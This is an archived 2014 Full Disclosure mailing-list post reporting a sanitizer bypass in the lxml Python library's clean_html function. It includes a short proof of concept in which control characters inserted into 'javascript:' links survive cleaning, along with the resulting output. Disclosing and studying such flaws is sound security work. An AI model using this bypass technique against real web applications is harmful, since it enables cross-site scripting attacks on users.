[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CACbpFaP9Ox9n=_Vp3amowm8mEC+m_ukTZfGTK2cTF0jbq2Omew@mail.gmail.com>
Date: Tue, 15 Apr 2014 22:30:12 +0400
From: Максим Кочкин <maxxarts@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] lxml (python lib) vulnerability
Hi, all
I've accidentally found vulnerability in clean_html function of lxml python
library. User can break schema of url with nonprinted chars (\x01-\x08).
Seems like all versions including the latest 3.3.4 are vulnerable. Here is
PoC.
from lxml.html.clean import clean_html
html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''
print clean_html(html)
Output:
<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
I've emailed lxml-guys. Hope they'll fix it soon.
----
ksimka (@m_ksimka)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists